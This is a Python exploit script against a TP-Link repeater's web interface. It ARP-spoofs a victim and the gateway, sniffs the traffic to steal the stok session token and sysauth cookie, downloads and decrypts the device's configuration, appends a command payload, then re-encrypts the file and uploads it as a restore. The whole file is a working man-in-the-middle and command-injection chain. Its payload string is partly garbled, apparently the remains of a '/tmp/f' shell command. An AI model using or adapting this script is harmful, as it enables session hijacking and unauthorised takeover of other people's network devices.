import os import sys import re import subprocess import zlib import socket import threading from scapy.all import sniff, TCP, Raw from Crypto.Cipher import AES PATTERN_STOK = r'stok=([a-fA-F0-9]{32})' PATTERN_SYSAUTH = r'Cookie:.*?sysauth=([a-fA-F0-9]{32})' AES_KEY = None AES_IV = None stok_value = None sysauth_value = None already_executed = False my_ip = socket.gethostbyname(socket.gethostname()) listener_proc = None def enable_ip_forwarding(): with open('/proc/sys/net/ipv4/ip_forward', 'w') as f: f.write('1') def disable_ip_forwarding(): with open('/proc/sys/net/ipv4/ip_forward', 'w') as f: f.write('0') def start_arpspoof(interface, target_ip, gateway_ip): print("[*] Starting ARP spoofing...") victim_cmd = ["arpspoof", "-i", interface, "-t", target_ip, gateway_ip] gateway_cmd = ["arpspoof", "-i", interface, "-t", gateway_ip, target_ip] victim_proc = subprocess.Popen(victim_cmd) gateway_proc = subprocess.Popen(gateway_cmd) return victim_proc, gateway_proc def send_backup_request(host, stok, cookie): print("[*] Downloading config from device...") url = f"http://{host}/cgi-bin/luci/;stok={stok}/admin/firmware?form=config" headers = [ "-H", f"Host: {host}", "-H", "Cache-Control: max-age=0", "-H", "Accept-Language: en-US,en;q=0.9", "-H", f"Origin: http://{host}", "-H", "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7VrK0PustljDtU3b", "-H", "Upgrade-Insecure-Requests: 1", "-H", "User-Agent: Mozilla/5.0", "-H", "Accept: */*", "-H", f"Referer: http://{host}/webpages/index.html?v=27da7fb562", "-H", "Accept-Encoding: identity", "-H", "Connection: keep-alive", "-H", f"Cookie: sysauth={cookie}" ] body = ( "------WebKitFormBoundary7VrK0PustljDtU3b\r\n" "Content-Disposition: form-data; name=\"operation\"\r\n\r\n" "backup\r\n" "------WebKitFormBoundary7VrK0PustljDtU3b--\r\n" ) cmd = ["curl", "-sS", "-k", "-X", "POST", url, *headers, "--data-binary", body, "--output", "config.bin"] subprocess.run(cmd, check=True) print("[+] Config downloaded successfully.") def decrypt_config(): print("[*] Decrypting config.bin...") with open("config.bin", "rb") as f: stage1 = AES.new(AES_KEY, AES.MODE_CBC, AES_IV).decrypt(f.read()) stage2 = zlib.decompress(stage1) stage3 = stage2[16:] stage4 = AES.new(AES_KEY, AES.MODE_CBC, AES_IV).decrypt(stage3) xml = zlib.decompress(stage4) with open("config.xml", "wb") as f: f.write(xml) print("[+] config.xml extracted and saved.") def append_payload(): payload = f""" /tmp/f; sleep 20;> 0 /tmp/f; sleep 20;> """ with open("config.xml", "a", encoding="utf-8") as f: f.write(payload) print("[+] Payload appended to config.xml") def encrypt_config(): print("[*] Encrypting modified config.xml...") with open("config.xml", "rb") as f: xml = f.read() xml_compressed = zlib.compress(xml) cipher1 = AES.new(AES_KEY, AES.MODE_CBC, AES_IV) encrypted1 = cipher1.encrypt(pad(xml_compressed)) header = bytes.fromhex("8047a859a1388b7c6e3b639e09260056") with open("tmp_config", "wb") as f: f.write(header + encrypted1) with open("tmp_config", "rb") as f: stage1 = f.read() stage1_compressed = zlib.compress(stage1) cipher2 = AES.new(AES_KEY, AES.MODE_CBC, AES_IV) final = cipher2.encrypt(pad(stage1_compressed)) with open("config.bin", "wb") as f: f.write(final) os.remove("tmp_config") print("[+] New config.bin created.") def pad(data): pad_len = 16 - (len(data) % 16) return data + bytes([pad_len] * pad_len) def upload_modified_config(host, stok, cookie): print("[*] Uploading modified config.bin to device...") url = f"http://tplinkrepeater.net/cgi-bin/luci/;stok={stok}/admin/firmware?form=config" headers = [ "-H", "Host: tplinkrepeater.net", "-H", "Cache-Control: max-age=0", "-H", "Accept-Language: en-US,en;q=0.9", "-H", "Origin: http://tplinkrepeater.net", "-H", "Upgrade-Insecure-Requests: 1", "-H", "User-Agent: Mozilla/5.0", "-H", "Accept: */*", "-H", "Referer: http://tplinkrepeater.net/webpages/index.html", "-H", "Accept-Encoding: identity", "-H", "Connection: keep-alive", "-H", f"Cookie: sysauth={cookie}" ] cmd = [ "curl", "-sS", "-k", "-X", "POST", url, *headers, "--form", "archive=@config.bin;type=application/octet-stream", "--form", "operation=restore", "--verbose" ] subprocess.run(cmd, check=True) print("[+] Config uploaded.") def packet_callback(packet): global stok_value, sysauth_value, already_executed if already_executed: return if packet.haslayer(TCP) and packet.haslayer(Raw): payload = packet[Raw].load.decode(errors="ignore") stok_match = re.search(PATTERN_STOK, payload) cookie_match = re.search(PATTERN_SYSAUTH, payload) if stok_match: stok_value = stok_match.group(1) if cookie_match: sysauth_value = cookie_match.group(1) if stok_value and sysauth_value: print("\n[+] Credentials intercepted:") print(f" stok: {stok_value}") print(f" sysauth: {sysauth_value}") try: send_backup_request(host, stok_value, sysauth_value) decrypt_config() append_payload() encrypt_config() upload_modified_config(host, stok_value, sysauth_value) already_executed = True except Exception as e: print(f"[-] Exploit failed: {e}") already_executed = False def start_sniffing(interface, target_ip): print("[*] Starting packet sniffing...") sniff(iface=interface, prn=packet_callback, store=0, filter=f"tcp and host {target_ip}") if __name__ == "__main__": if os.geteuid() != 0: print("[-] This script must be run as root.") sys.exit(1) if len(sys.argv) != 6: print("Usage: sudo python3 exploit.py ") sys.exit(1) iface = sys.argv[1] victim_ip = sys.argv[2] host = sys.argv[3] AES_KEY = bytes.fromhex(sys.argv[4]) AES_IV = bytes.fromhex(sys.argv[5]) try: enable_ip_forwarding() v_proc, g_proc = start_arpspoof(iface, victim_ip, host) start_sniffing(iface, victim_ip) except KeyboardInterrupt: print("\n[!] Stopping exploit...") v_proc.terminate() g_proc.terminate() disable_ip_forwarding() print("[*] IP forwarding disabled.")